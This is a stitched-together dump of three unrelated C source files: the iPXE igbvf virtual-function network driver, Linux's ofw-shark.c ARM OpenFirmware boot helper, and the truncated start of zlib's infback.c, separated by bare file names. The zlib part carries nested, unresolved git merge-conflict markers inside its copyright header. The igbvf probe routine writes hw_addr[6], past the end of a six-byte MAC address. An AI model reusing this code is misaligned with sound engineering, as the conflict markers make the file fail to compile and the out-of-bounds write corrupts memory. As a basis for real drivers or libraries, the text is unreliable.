02110-1301 USA. The full GNU General Public License is included in this distribution in the file called "COPYING". Contact Information: e1000-devel Mailing List <e1000-devel@lists.sourceforge.net> Intel Corporation, 5200 N.E. Elam Young Parkway, Hillsboro, OR 97124-6497 *******************************************************************************/ FILE_LICENCE ( GPL2_ONLY ); #include "igbvf.h" /** * igbvf_setup_tx_resources - allocate Tx resources (Descriptors) * * @v adapter e1000 private structure * * @ret rc Returns 0 on success, negative on failure **/ int igbvf_setup_tx_resources ( struct igbvf_adapter *adapter ) { DBG ( "igbvf_setup_tx_resources\n" ); /* Allocate transmit descriptor ring memory. It must not cross a 64K boundary because of hardware errata #23 so we use malloc_dma() requesting a 128 byte block that is 128 byte aligned. This should guarantee that the memory allocated will not cross a 64K boundary, because 128 is an even multiple of 65536 ( 65536 / 128 == 512 ), so all possible allocations of 128 bytes on a 128 byte boundary will not cross 64K bytes. */ adapter->tx_base = malloc_dma ( adapter->tx_ring_size, adapter->tx_ring_size ); if ( ! adapter->tx_base ) { return -ENOMEM; } memset ( adapter->tx_base, 0, adapter->tx_ring_size ); DBG ( "adapter->tx_base = %#08lx\n", virt_to_bus ( adapter->tx_base ) ); return 0; } /** * igbvf_free_tx_resources - Free Tx Resources per Queue * @adapter: board private structure * * Free all transmit software resources **/ void igbvf_free_tx_resources ( struct igbvf_adapter *adapter ) { DBG ( "igbvf_free_tx_resources\n" ); free_dma ( adapter->tx_base, adapter->tx_ring_size ); } /** * igbvf_free_rx_resources - Free Rx Resources * @adapter: board private structure * * Free all receive software resources **/ void igbvf_free_rx_resources ( struct igbvf_adapter *adapter ) { int i; DBG ( "igbvf_free_rx_resources\n" ); free_dma ( adapter->rx_base, adapter->rx_ring_size ); for ( i = 0; i < NUM_RX_DESC; i++ ) { free_iob ( adapter->rx_iobuf[i] ); } } /** * igbvf_refill_rx_ring - allocate Rx io_buffers * * @v adapter e1000 private structure * * @ret rc Returns 0 on success, negative on failure **/ static int igbvf_refill_rx_ring ( struct igbvf_adapter *adapter ) { int i, rx_curr; int rc = 0; union e1000_adv_rx_desc *rx_curr_desc; struct e1000_hw *hw = &adapter->hw; struct io_buffer *iob; DBGP ("igbvf_refill_rx_ring\n"); for ( i = 0; i < NUM_RX_DESC; i++ ) { rx_curr = ( ( adapter->rx_curr + i ) % NUM_RX_DESC ); rx_curr_desc = adapter->rx_base + rx_curr; if ( rx_curr_desc->wb.upper.status_error & E1000_RXD_STAT_DD ) continue; if ( adapter->rx_iobuf[rx_curr] != NULL ) continue; DBG2 ( "Refilling rx desc %d\n", rx_curr ); iob = alloc_iob ( MAXIMUM_ETHERNET_VLAN_SIZE ); adapter->rx_iobuf[rx_curr] = iob; rx_curr_desc->wb.upper.status_error = 0; if ( ! iob ) { DBG ( "alloc_iob failed\n" ); rc = -ENOMEM; break; } else { rx_curr_desc->read.pkt_addr = virt_to_bus ( iob->data ); rx_curr_desc->read.hdr_addr = 0; ew32 ( RDT(0), rx_curr ); } } return rc; } /** * igbvf_irq_disable - Mask off interrupt generation on the NIC * @adapter: board private structure **/ static void igbvf_irq_disable ( struct igbvf_adapter *adapter ) { struct e1000_hw *hw = &adapter->hw; ew32 ( EIMC, ~0 ); } /** * igbvf_irq_enable - Enable default interrupt generation settings * @adapter: board private structure **/ static void igbvf_irq_enable ( struct igbvf_adapter *adapter ) { struct e1000_hw *hw = &adapter->hw; ew32 ( EIAC, IMS_ENABLE_MASK ); ew32 ( EIAM, IMS_ENABLE_MASK ); ew32 ( EIMS, IMS_ENABLE_MASK ); } /** * igbvf_irq - enable or Disable interrupts * * @v adapter e1000 adapter * @v action requested interrupt action **/ static void igbvf_irq ( struct net_device *netdev, int enable ) { struct igbvf_adapter *adapter = netdev_priv ( netdev ); DBG ( "igbvf_irq\n" ); if ( enable ) { igbvf_irq_enable ( adapter ); } else { igbvf_irq_disable ( adapter ); } } /** * igbvf_process_tx_packets - process transmitted packets * * @v netdev network interface device structure **/ static void igbvf_process_tx_packets ( struct net_device *netdev ) { struct igbvf_adapter *adapter = netdev_priv ( netdev ); uint32_t i; uint32_t tx_status; union e1000_adv_tx_desc *tx_curr_desc; /* Check status of transmitted packets */ DBGP ( "process_tx_packets: tx_head = %d, tx_tail = %d\n", adapter->tx_head, adapter->tx_tail ); while ( ( i = adapter->tx_head ) != adapter->tx_tail ) { tx_curr_desc = ( void * ) ( adapter->tx_base ) + ( i * sizeof ( *adapter->tx_base ) ); tx_status = tx_curr_desc->wb.status; DBG ( " tx_curr_desc = %#08lx\n", virt_to_bus ( tx_curr_desc ) ); DBG ( " tx_status = %#08x\n", tx_status ); /* if the packet at tx_head is not owned by hardware it is for us */ if ( ! ( tx_status & E1000_TXD_STAT_DD ) ) break; DBG ( "Sent packet. tx_head: %d tx_tail: %d tx_status: %#08x\n", adapter->tx_head, adapter->tx_tail, tx_status ); netdev_tx_complete ( netdev, adapter->tx_iobuf[i] ); DBG ( "Success transmitting packet, tx_status: %#08x\n", tx_status ); /* Decrement count of used descriptors, clear this descriptor */ adapter->tx_fill_ctr--; memset ( tx_curr_desc, 0, sizeof ( *tx_curr_desc ) ); adapter->tx_head = ( adapter->tx_head + 1 ) % NUM_TX_DESC; } } /** * igbvf_process_rx_packets - process received packets * * @v netdev network interface device structure **/ static void igbvf_process_rx_packets ( struct net_device *netdev ) { struct igbvf_adapter *adapter = netdev_priv ( netdev ); struct e1000_hw *hw = &adapter->hw; uint32_t i; uint32_t rx_status; uint32_t rx_len; uint32_t rx_err; union e1000_adv_rx_desc *rx_curr_desc; DBGP ( "igbvf_process_rx_packets\n" ); /* Process received packets */ while ( 1 ) { i = adapter->rx_curr; rx_curr_desc = ( void * ) ( adapter->rx_base ) + ( i * sizeof ( *adapter->rx_base ) ); rx_status = rx_curr_desc->wb.upper.status_error; DBG2 ( "Before DD Check RX_status: %#08x, rx_curr: %d\n", rx_status, i ); if ( ! ( rx_status & E1000_RXD_STAT_DD ) ) break; if ( adapter->rx_iobuf[i] == NULL ) break; DBG ( "E1000_RCTL = %#08x\n", er32 (RCTL) ); rx_len = rx_curr_desc->wb.upper.length; DBG ( "Received packet, rx_curr: %d rx_status: %#08x rx_len: %d\n", i, rx_status, rx_len ); rx_err = rx_status; iob_put ( adapter->rx_iobuf[i], rx_len ); if ( rx_err & E1000_RXDEXT_ERR_FRAME_ERR_MASK ) { netdev_rx_err ( netdev, adapter->rx_iobuf[i], -EINVAL ); DBG ( "igbvf_process_rx_packets: Corrupted packet received!" " rx_err: %#08x\n", rx_err ); } else { /* Add this packet to the receive queue. */ netdev_rx ( netdev, adapter->rx_iobuf[i] ); } adapter->rx_iobuf[i] = NULL; memset ( rx_curr_desc, 0, sizeof ( *rx_curr_desc ) ); adapter->rx_curr = ( adapter->rx_curr + 1 ) % NUM_RX_DESC; } } /** * igbvf_poll - Poll for received packets * * @v netdev Network device */ static void igbvf_poll ( struct net_device *netdev ) { struct igbvf_adapter *adapter = netdev_priv ( netdev ); uint32_t rx_status; union e1000_adv_rx_desc *rx_curr_desc; DBGP ( "igbvf_poll\n" ); rx_curr_desc = ( void * ) ( adapter->rx_base ) + ( adapter->rx_curr * sizeof ( *adapter->rx_base ) ); rx_status = rx_curr_desc->wb.upper.status_error; if ( ! ( rx_status & E1000_RXD_STAT_DD ) ) return; igbvf_process_tx_packets ( netdev ); igbvf_process_rx_packets ( netdev ); igbvf_refill_rx_ring ( adapter ); } /** * igbvf_config_collision_dist_generic - Configure collision distance * @hw: pointer to the HW structure * * Configures the collision distance to the default value and is used * during link setup. Currently no func pointer exists and all * implementations are handled in the generic version of this function. **/ void igbvf_config_collision_dist ( struct e1000_hw *hw ) { u32 tctl; DBG ("igbvf_config_collision_dist"); tctl = er32 (TCTL); tctl &= ~E1000_TCTL_COLD; tctl |= E1000_COLLISION_DISTANCE << E1000_COLD_SHIFT; ew32 (TCTL, tctl); e1e_flush(); } /** * igbvf_configure_tx - Configure Transmit Unit after Reset * @adapter: board private structure * * Configure the Tx unit of the MAC after a reset. **/ static void igbvf_configure_tx ( struct igbvf_adapter *adapter ) { struct e1000_hw *hw = &adapter->hw; u32 tctl, txdctl; DBG ( "igbvf_configure_tx\n" ); /* disable transmits while setting up the descriptors */ tctl = er32 ( TCTL ); ew32 ( TCTL, tctl & ~E1000_TCTL_EN ); e1e_flush(); mdelay (10); ew32 ( TDBAH(0), 0 ); ew32 ( TDBAL(0), virt_to_bus ( adapter->tx_base ) ); ew32 ( TDLEN(0), adapter->tx_ring_size ); DBG ( "E1000_TDBAL(0): %#08x\n", er32 ( TDBAL(0) ) ); DBG ( "E1000_TDLEN(0): %d\n", er32 ( TDLEN(0) ) ); /* Setup the HW Tx Head and Tail descriptor pointers */ ew32 ( TDH(0), 0 ); ew32 ( TDT(0), 0 ); adapter->tx_head = 0; adapter->tx_tail = 0; adapter->tx_fill_ctr = 0; txdctl = er32(TXDCTL(0)); txdctl |= E1000_TXDCTL_QUEUE_ENABLE; ew32 ( TXDCTL(0), txdctl ); txdctl = er32 ( TXDCTL(0) ); txdctl |= E1000_TXDCTL_QUEUE_ENABLE; ew32 ( TXDCTL(0), txdctl ); /* Setup Transmit Descriptor Settings for eop descriptor */ adapter->txd_cmd = E1000_ADVTXD_DCMD_EOP | E1000_ADVTXD_DCMD_IFCS; /* Advanced descriptor */ adapter->txd_cmd |= E1000_ADVTXD_DCMD_DEXT; /* (not part of cmd, but in same 32 bit word...) */ adapter->txd_cmd |= E1000_ADVTXD_DTYP_DATA; /* enable Report Status bit */ adapter->txd_cmd |= E1000_ADVTXD_DCMD_RS; /* Program the Transmit Control Register */ tctl &= ~E1000_TCTL_CT; tctl |= E1000_TCTL_PSP | E1000_TCTL_RTLC | (E1000_COLLISION_THRESHOLD << E1000_CT_SHIFT); igbvf_config_collision_dist ( hw ); /* Enable transmits */ tctl |= E1000_TCTL_EN; ew32(TCTL, tctl); e1e_flush(); } /* igbvf_reset - bring the hardware into a known good state * * This function boots the hardware and enables some settings that * require a configuration cycle of the hardware - those cannot be * set/changed during runtime. After reset the device needs to be * properly configured for Rx, Tx etc. */ void igbvf_reset ( struct igbvf_adapter *adapter ) { struct e1000_mac_info *mac = &adapter->hw.mac; struct net_device *netdev = adapter->netdev; struct e1000_hw *hw = &adapter->hw; /* Allow time for pending master requests to run */ if ( mac->ops.reset_hw(hw) ) DBG ("PF still resetting\n"); mac->ops.init_hw ( hw ); if ( is_valid_ether_addr(adapter->hw.mac.addr) ) { memcpy ( netdev->hw_addr, adapter->hw.mac.addr, ETH_ALEN ); } } extern void igbvf_init_function_pointers_vf(struct e1000_hw *hw); /** * igbvf_sw_init - Initialize general software structures (struct igbvf_adapter) * @adapter: board private structure to initialize * * igbvf_sw_init initializes the Adapter private data structure. * Fields are initialized based on PCI device information and * OS network device settings (MTU size). **/ static int __devinit igbvf_sw_init ( struct igbvf_adapter *adapter ) { struct e1000_hw *hw = &adapter->hw; struct pci_device *pdev = adapter->pdev; int rc; /* PCI config space info */ hw->vendor_id = pdev->vendor; hw->device_id = pdev->device; pci_read_config_byte ( pdev, PCI_REVISION, &hw->revision_id ); pci_read_config_word ( pdev, PCI_COMMAND, &hw->bus.pci_cmd_word ); adapter->max_frame_size = MAXIMUM_ETHERNET_VLAN_SIZE + ETH_HLEN + ETH_FCS_LEN; adapter->min_frame_size = ETH_ZLEN + ETH_FCS_LEN; /* Set various function pointers */ igbvf_init_function_pointers_vf ( &adapter->hw ); rc = adapter->hw.mac.ops.init_params ( &adapter->hw ); if (rc) { DBG ("hw.mac.ops.init_params(&adapter->hw) Failure\n"); return rc; } rc = adapter->hw.mbx.ops.init_params ( &adapter->hw ); if (rc) { DBG ("hw.mbx.ops.init_params(&adapter->hw) Failure\n"); return rc; } /* Explicitly disable IRQ since the NIC can be in any state. */ igbvf_irq_disable ( adapter ); return 0; } /** * igbvf_setup_srrctl - configure the receive control registers * @adapter: Board private structure **/ static void igbvf_setup_srrctl ( struct igbvf_adapter *adapter ) { struct e1000_hw *hw = &adapter->hw; u32 srrctl = 0; DBG ( "igbvf_setup_srrctl\n" ); srrctl &= ~(E1000_SRRCTL_DESCTYPE_MASK | E1000_SRRCTL_BSIZEHDR_MASK | E1000_SRRCTL_BSIZEPKT_MASK); /* Enable queue drop to avoid head of line blocking */ srrctl |= E1000_SRRCTL_DROP_EN; /* Setup buffer sizes */ srrctl |= 2048 >> E1000_SRRCTL_BSIZEPKT_SHIFT; srrctl |= E1000_SRRCTL_DESCTYPE_ADV_ONEBUF; ew32 ( SRRCTL(0), srrctl ); } /** * igbvf_configure_rx - Configure 8254x Receive Unit after Reset * @adapter: board private structure * * Configure the Rx unit of the MAC after a reset. **/ static void igbvf_configure_rx ( struct igbvf_adapter *adapter ) { struct e1000_hw *hw = &adapter->hw; u32 rxdctl; DBG ( "igbvf_configure_rx\n" ); /* disable receives */ rxdctl = er32 ( RXDCTL(0) ); ew32 ( RXDCTL(0), rxdctl & ~E1000_RXDCTL_QUEUE_ENABLE ); msleep ( 10 ); /* * Setup the HW Rx Head and Tail Descriptor Pointers and * the Base and Length of the Rx Descriptor Ring */ ew32 ( RDBAL(0), virt_to_bus (adapter->rx_base) ); ew32 ( RDBAH(0), 0 ); ew32 ( RDLEN(0), adapter->rx_ring_size ); adapter->rx_curr = 0; ew32 ( RDH(0), 0 ); ew32 ( RDT(0), 0 ); rxdctl |= E1000_RXDCTL_QUEUE_ENABLE; rxdctl &= 0xFFF00000; rxdctl |= IGBVF_RX_PTHRESH; rxdctl |= IGBVF_RX_HTHRESH << 8; rxdctl |= IGBVF_RX_WTHRESH << 16; igbvf_rlpml_set_vf ( hw, adapter->max_frame_size ); /* enable receives */ ew32 ( RXDCTL(0), rxdctl ); ew32 ( RDT(0), NUM_RX_DESC ); } /** * igbvf_setup_rx_resources - allocate Rx resources (Descriptors) * * @v adapter e1000 private structure **/ int igbvf_setup_rx_resources ( struct igbvf_adapter *adapter ) { int i; union e1000_adv_rx_desc *rx_curr_desc; struct io_buffer *iob; DBG ( "igbvf_setup_rx_resources\n" ); /* Allocate receive descriptor ring memory. It must not cross a 64K boundary because of hardware errata */ adapter->rx_base = malloc_dma ( adapter->rx_ring_size, adapter->rx_ring_size ); if ( ! adapter->rx_base ) { return -ENOMEM; } memset ( adapter->rx_base, 0, adapter->rx_ring_size ); for ( i = 0; i < NUM_RX_DESC; i++ ) { rx_curr_desc = adapter->rx_base + i; iob = alloc_iob ( MAXIMUM_ETHERNET_VLAN_SIZE ); adapter->rx_iobuf[i] = iob; rx_curr_desc->wb.upper.status_error = 0; if ( ! iob ) { DBG ( "alloc_iob failed\n" ); return -ENOMEM; } else { rx_curr_desc->read.pkt_addr = virt_to_bus ( iob->data ); rx_curr_desc->read.hdr_addr = 0; } } return 0; } /** * igbvf_open - Called when a network interface is made active * @netdev: network interface device structure * * Returns 0 on success, negative value on failure * * The open entry point is called when a network interface is made * active by the system (IFF_UP). At this point all resources needed * for transmit and receive operations are allocated, the interrupt * handler is registered with the OS, the watchdog timer is started, * and the stack is notified that the interface is ready. **/ static int igbvf_open ( struct net_device *netdev ) { struct igbvf_adapter *adapter = netdev_priv ( netdev ); int err; DBG ("igbvf_open\n"); /* Update MAC address */ memcpy ( adapter->hw.mac.addr, netdev->ll_addr, ETH_ALEN ); igbvf_reset( adapter ); /* allocate transmit descriptors */ err = igbvf_setup_tx_resources ( adapter ); if (err) { DBG ( "Error setting up TX resources!\n" ); goto err_setup_tx; } igbvf_configure_tx ( adapter ); igbvf_setup_srrctl( adapter ); err = igbvf_setup_rx_resources( adapter ); if (err) { DBG ( "Error setting up RX resources!\n" ); goto err_setup_rx; } igbvf_configure_rx ( adapter ); return 0; err_setup_rx: DBG ( "err_setup_rx\n" ); igbvf_free_tx_resources ( adapter ); return err; err_setup_tx: DBG ( "err_setup_tx\n" ); igbvf_reset ( adapter ); return err; } /** * igbvf_close - Disables a network interface * @netdev: network interface device structure * * Returns 0, this is not allowed to fail * * The close entry point is called when an interface is de-activated * by the OS. The hardware is still under the drivers control, but * needs to be disabled. A global MAC reset is issued to stop the * hardware, and all transmit and receive resources are freed. **/ static void igbvf_close ( struct net_device *netdev ) { struct igbvf_adapter *adapter = netdev_priv ( netdev ); struct e1000_hw *hw = &adapter->hw; uint32_t rxdctl; DBG ( "igbvf_close\n" ); /* Disable and acknowledge interrupts */ igbvf_irq_disable ( adapter ); er32(EICR); /* disable receives */ rxdctl = er32 ( RXDCTL(0) ); ew32 ( RXDCTL(0), rxdctl & ~E1000_RXDCTL_QUEUE_ENABLE ); mdelay ( 10 ); igbvf_reset ( adapter ); igbvf_free_tx_resources( adapter ); igbvf_free_rx_resources( adapter ); } /** * igbvf_transmit - Transmit a packet * * @v netdev Network device * @v iobuf I/O buffer * * @ret rc Returns 0 on success, negative on failure */ static int igbvf_transmit ( struct net_device *netdev, struct io_buffer *iobuf ) { struct igbvf_adapter *adapter = netdev_priv ( netdev ); struct e1000_hw *hw = &adapter->hw; uint32_t tx_curr = adapter->tx_tail; union e1000_adv_tx_desc *tx_curr_desc; DBGP ("igbvf_transmit\n"); if ( adapter->tx_fill_ctr == NUM_TX_DESC ) { DBG ("TX overflow\n"); return -ENOBUFS; } /* Save pointer to iobuf we have been given to transmit, netdev_tx_complete() will need it later */ adapter->tx_iobuf[tx_curr] = iobuf; tx_curr_desc = ( void * ) ( adapter->tx_base ) + ( tx_curr * sizeof ( *adapter->tx_base ) ); DBG ( "tx_curr_desc = %#08lx\n", virt_to_bus ( tx_curr_desc ) ); DBG ( "tx_curr_desc + 16 = %#08lx\n", virt_to_bus ( tx_curr_desc ) + 16 ); DBG ( "iobuf->data = %#08lx\n", virt_to_bus ( iobuf->data ) ); /* Add the packet to TX ring */ tx_curr_desc->read.buffer_addr = virt_to_bus ( iobuf->data ); tx_curr_desc->read.cmd_type_len = adapter->txd_cmd |(iob_len ( iobuf )) ; // minus hdr_len ???? tx_curr_desc->read.olinfo_status = ((iob_len ( iobuf )) << E1000_ADVTXD_PAYLEN_SHIFT); DBG ( "TX fill: %d tx_curr: %d addr: %#08lx len: %zd\n", adapter->tx_fill_ctr, tx_curr, virt_to_bus ( iobuf->data ), iob_len ( iobuf ) ); /* Point to next free descriptor */ adapter->tx_tail = ( adapter->tx_tail + 1 ) % NUM_TX_DESC; adapter->tx_fill_ctr++; /* Write new tail to NIC, making packet available for transmit */ ew32 ( TDT(0), adapter->tx_tail ); e1e_flush (); return 0; } /** igbvf net device operations */ static struct net_device_operations igbvf_operations = { .open = igbvf_open, .close = igbvf_close, .transmit = igbvf_transmit, .poll = igbvf_poll, .irq = igbvf_irq, }; /** * igbvf_get_hw_control - get control of the h/w from f/w * @adapter: address of board private structure * * igb_get_hw_control sets CTRL_EXT:DRV_LOAD bit. * For ASF and Pass Through versions of f/w this means that * the driver is loaded. * **/ void igbvf_get_hw_control ( struct igbvf_adapter *adapter ) { struct e1000_hw *hw = &adapter->hw; u32 ctrl_ext; /* Let firmware know the driver has taken over */ ctrl_ext = er32 ( CTRL_EXT ); ew32 ( CTRL_EXT, ctrl_ext | E1000_CTRL_EXT_DRV_LOAD ); } /** * igbvf_probe - Device Initialization Routine * @pdev: PCI device information struct * @ent: entry in igbvf_pci_tbl * * Returns 0 on success, negative on failure * * igbvf_probe initializes an adapter identified by a pci_dev structure. * The OS initialization, configuring of the adapter private structure, * and a hardware reset occur. **/ int igbvf_probe ( struct pci_device *pdev ) { int err; struct net_device *netdev; struct igbvf_adapter *adapter; unsigned long mmio_start, mmio_len; struct e1000_hw *hw; DBG ( "igbvf_probe\n" ); err = -ENOMEM; /* Allocate net device ( also allocates memory for netdev->priv and makes netdev-priv point to it ) */ netdev = alloc_etherdev ( sizeof ( struct igbvf_adapter ) ); if ( ! netdev ) goto err_alloc_etherdev; /* Associate igbvf-specific network operations operations with * generic network device layer */ netdev_init ( netdev, &igbvf_operations ); /* Associate this network device with given PCI device */ pci_set_drvdata ( pdev, netdev ); netdev->dev = &pdev->dev; /* Initialize driver private storage */ adapter = netdev_priv ( netdev ); memset ( adapter, 0, ( sizeof ( *adapter ) ) ); adapter->pdev = pdev; adapter->ioaddr = pdev->ioaddr; adapter->hw.io_base = pdev->ioaddr; hw = &adapter->hw; hw->vendor_id = pdev->vendor; hw->device_id = pdev->device; adapter->irqno = pdev->irq; adapter->netdev = netdev; adapter->hw.back = adapter; adapter->min_frame_size = ETH_ZLEN + ETH_FCS_LEN; adapter->max_hw_frame_size = ETH_FRAME_LEN + ETH_FCS_LEN; adapter->tx_ring_size = sizeof ( *adapter->tx_base ) * NUM_TX_DESC; adapter->rx_ring_size = sizeof ( *adapter->rx_base ) * NUM_RX_DESC; /* Fix up PCI device */ adjust_pci_device ( pdev ); err = -EIO; mmio_start = pci_bar_start ( pdev, PCI_BASE_ADDRESS_0 ); mmio_len = pci_bar_size ( pdev, PCI_BASE_ADDRESS_0 ); DBG ( "mmio_start: %#08lx\n", mmio_start ); DBG ( "mmio_len: %#08lx\n", mmio_len ); adapter->hw.hw_addr = ioremap ( mmio_start, mmio_len ); DBG ( "adapter->hw.hw_addr: %p\n", adapter->hw.hw_addr ); if ( ! adapter->hw.hw_addr ) { DBG ( "err_ioremap\n" ); goto err_ioremap; } /* setup adapter struct */ err = igbvf_sw_init ( adapter ); if (err) { DBG ( "err_sw_init\n" ); goto err_sw_init; } /* reset the controller to put the device in a known good state */ err = hw->mac.ops.reset_hw ( hw ); if ( err ) { DBG ("PF still in reset state, assigning new address\n"); netdev->hw_addr[0] = 0x21; netdev->hw_addr[1] = 0x21; netdev->hw_addr[2] = 0x21; netdev->hw_addr[3] = 0x21; netdev->hw_addr[4] = 0x21; netdev->hw_addr[5] = 0x21; netdev->hw_addr[6] = 0x21; } else { err = hw->mac.ops.read_mac_addr(hw); if (err) { DBG ("Error reading MAC address\n"); goto err_hw_init; } if ( ! is_valid_ether_addr(adapter->hw.mac.addr) ) { /* Assign random MAC address */ eth_random_addr(adapter->hw.mac.addr); } } memcpy ( netdev->hw_addr, adapter->hw.mac.addr, ETH_ALEN ); /* reset the hardware with the new settings */ igbvf_reset ( adapter ); /* let the f/w know that the h/w is now under the control of the * driver. */ igbvf_get_hw_control ( adapter ); /* Mark as link up; we don't yet handle link state */ netdev_link_up ( netdev ); if ( ( err = register_netdev ( netdev ) ) != 0) { DBG ( "err_register\n" ); goto err_register; } DBG ("igbvf_probe_succeeded\n"); return 0; err_register: err_hw_init: err_sw_init: iounmap ( adapter->hw.hw_addr ); err_ioremap: netdev_put ( netdev ); err_alloc_etherdev: return err; } /** * igbvf_remove - Device Removal Routine * @pdev: PCI device information struct * * igbvf_remove is called by the PCI subsystem to alert the driver * that it should release a PCI device. The could be caused by a * Hot-Plug event, or because the driver is going to be removed from * memory. **/ void igbvf_remove ( struct pci_device *pdev ) { struct net_device *netdev = pci_get_drvdata ( pdev ); struct igbvf_adapter *adapter = netdev_priv ( netdev ); DBG ( "igbvf_remove\n" ); if ( adapter->hw.flash_address ) iounmap ( adapter->hw.flash_address ); if ( adapter->hw.hw_addr ) iounmap ( adapter->hw.hw_addr ); unregister_netdev ( netdev ); igbvf_reset ( adapter ); netdev_nullify ( netdev ); netdev_put ( netdev ); } static struct pci_device_id igbvf_pci_tbl[] = { PCI_ROM(0x8086, 0x10CA, "igbvf", "E1000_DEV_ID_82576_VF", 0), PCI_ROM(0x8086, 0x1520, "i350vf", "E1000_DEV_ID_I350_VF", 0), }; struct pci_driver igbvf_driver __pci_driver = { .ids = igbvf_pci_tbl, .id_count = (sizeof(igbvf_pci_tbl) / sizeof(igbvf_pci_tbl[0])), .probe = igbvf_probe, .remove = igbvf_remove, };
918369.c
/* * linux/arch/arm/boot/compressed/ofw-shark.c * * by Alexander Schulz * * This file is used to get some basic information * about the memory layout of the shark we are running * on. Memory is usually divided in blocks a 8 MB. * And bootargs are copied from OpenFirmware. */ #include <linux/kernel.h> #include <linux/types.h> #include <asm/setup.h> #include <asm/page.h> asmlinkage void create_params (unsigned long *buffer) { /* Is there a better address? Also change in mach-shark/core.c */ struct tag *tag = (struct tag *) 0x08003000; int j,i,m,k,nr_banks,size; unsigned char *c; k = 0; /* Head of the taglist */ tag->hdr.tag = ATAG_CORE; tag->hdr.size = tag_size(tag_core); tag->u.core.flags = 1; tag->u.core.pagesize = PAGE_SIZE; tag->u.core.rootdev = 0; /* Build up one tagged block for each memory region */ size=0; nr_banks=(unsigned int) buffer[0]; for (j=0;j<nr_banks;j++){ /* search the lowest address and put it into the next entry */ /* not a fast sort algorithm, but there are at most 8 entries */ /* and this is used only once anyway */ m=0xffffffff; for (i=0;i<(unsigned int) buffer[0];i++){ if (buffer[2*i+1]<m) { m=buffer[2*i+1]; k=i; } } tag = tag_next(tag); tag->hdr.tag = ATAG_MEM; tag->hdr.size = tag_size(tag_mem32); tag->u.mem.size = buffer[2*k+2]; tag->u.mem.start = buffer[2*k+1]; size += buffer[2*k+2]; buffer[2*k+1]=0xffffffff; /* mark as copied */ } /* The command line */ tag = tag_next(tag); tag->hdr.tag = ATAG_CMDLINE; c=(unsigned char *)(&buffer[34]); j=0; while (*c) tag->u.cmdline.cmdline[j++]=*c++; tag->u.cmdline.cmdline[j]=0; tag->hdr.size = (j + 7 + sizeof(struct tag_header)) >> 2; /* Hardware revision */ tag = tag_next(tag); tag->hdr.tag = ATAG_REVISION; tag->hdr.size = tag_size(tag_revision); tag->u.revision.rev = ((unsigned char) buffer[33])-'0'; /* End of the taglist */ tag = tag_next(tag); tag->hdr.tag = 0; tag->hdr.size = 0; } typedef int (*ofw_handle_t)(void *); /* Everything below is called with a wrong MMU setting. * This means: no string constants, no initialization of * arrays, no global variables! This is ugly but I didn't * want to write this in assembler :-) */ int of_decode_int(const unsigned char *p) { unsigned int i = *p++ << 8; i = (i + *p++) << 8; i = (i + *p++) << 8; return (i + *p); } int OF_finddevice(ofw_handle_t openfirmware, char *name) { unsigned int args[8]; char service[12]; service[0]='f'; service[1]='i'; service[2]='n'; service[3]='d'; service[4]='d'; service[5]='e'; service[6]='v'; service[7]='i'; service[8]='c'; service[9]='e'; service[10]='\0'; args[0]=(unsigned int)service; args[1]=1; args[2]=1; args[3]=(unsigned int)name; if (openfirmware(args) == -1) return -1; return args[4]; } int OF_getproplen(ofw_handle_t openfirmware, int handle, char *prop) { unsigned int args[8]; char service[12]; service[0]='g'; service[1]='e'; service[2]='t'; service[3]='p'; service[4]='r'; service[5]='o'; service[6]='p'; service[7]='l'; service[8]='e'; service[9]='n'; service[10]='\0'; args[0] = (unsigned int)service; args[1] = 2; args[2] = 1; args[3] = (unsigned int)handle; args[4] = (unsigned int)prop; if (openfirmware(args) == -1) return -1; return args[5]; } int OF_getprop(ofw_handle_t openfirmware, int handle, char *prop, void *buf, unsigned int buflen) { unsigned int args[8]; char service[8]; service[0]='g'; service[1]='e'; service[2]='t'; service[3]='p'; service[4]='r'; service[5]='o'; service[6]='p'; service[7]='\0'; args[0] = (unsigned int)service; args[1] = 4; args[2] = 1; args[3] = (unsigned int)handle; args[4] = (unsigned int)prop; args[5] = (unsigned int)buf; args[6] = buflen; if (openfirmware(args) == -1) return -1; return args[7]; } asmlinkage void ofw_init(ofw_handle_t o, int *nomr, int *pointer) { int phandle,i,mem_len,buffer[32]; char temp[15]; temp[0]='/'; temp[1]='m'; temp[2]='e'; temp[3]='m'; temp[4]='o'; temp[5]='r'; temp[6]='y'; temp[7]='\0'; phandle=OF_finddevice(o,temp); temp[0]='r'; temp[1]='e'; temp[2]='g'; temp[3]='\0'; mem_len = OF_getproplen(o,phandle, temp); OF_getprop(o,phandle, temp, buffer, mem_len); *nomr=mem_len >> 3; for (i=0; i<=mem_len/4; i++) pointer[i]=of_decode_int((const unsigned char *)&buffer[i]); temp[0]='/'; temp[1]='c'; temp[2]='h'; temp[3]='o'; temp[4]='s'; temp[5]='e'; temp[6]='n'; temp[7]='\0'; phandle=OF_finddevice(o,temp); temp[0]='b'; temp[1]='o'; temp[2]='o'; temp[3]='t'; temp[4]='a'; temp[5]='r'; temp[6]='g'; temp[7]='s'; temp[8]='\0'; mem_len = OF_getproplen(o,phandle, temp); OF_getprop(o,phandle, temp, buffer, mem_len); if (mem_len > 128) mem_len=128; for (i=0; i<=mem_len/4; i++) pointer[i+33]=buffer[i]; pointer[i+33]=0; temp[0]='/'; temp[1]='\0'; phandle=OF_finddevice(o,temp); temp[0]='b'; temp[1]='a'; temp[2]='n'; temp[3]='n'; temp[4]='e'; temp[5]='r'; temp[6]='-'; temp[7]='n'; temp[8]='a'; temp[9]='m'; temp[10]='e'; temp[11]='\0'; mem_len = OF_getproplen(o,phandle, temp); OF_getprop(o,phandle, temp, buffer, mem_len); * ((unsigned char *) &pointer[32]) = ((unsigned char *) buffer)[mem_len-2]; }
344192.c
/* infback.c -- inflate using a call-back interface <<<<<<< HEAD <<<<<<< HEAD <<<<<<< HEAD * Copyright (C) 1995-2011 Mark Adler ======= * Copyright (C) 1995-2016 Mark Adler >>>>>>> upstream/master ======= * Copyright (C) 1995-2016 Mark Adler >>>>>>> upstream/master ======= * Copyright (C) 1995-2016 Mark Adler >>>>>>> upstream/master * For conditions of distribution and use, see copyright notice in zlib.h */ /* This code is largely copied from inflate.c. Normally either infback.o or inflate.o would be linked into an application--not both. The interface with inffast.c is retained so that optimized assembler-coded versions of inflate_fast() can be used with either inflate.c or infback.c. */ #include "zutil.h" #include "inftrees.h" #include "inflate.h" #include "inffast.h" /* function prototypes */ local void fixedtables OF((struct inflate_state FAR *state)); /* strm provides memory allocation functions in zalloc and zfree, or Z_NULL to use the library memory allocation functions. windowBits is in the range 8..15, and window is a user-supplied window and output buffer that is 2**windowBits bytes. */ int ZEXPORT inflateBackInit_(strm, windowBits, window, version, stream_size) z_streamp 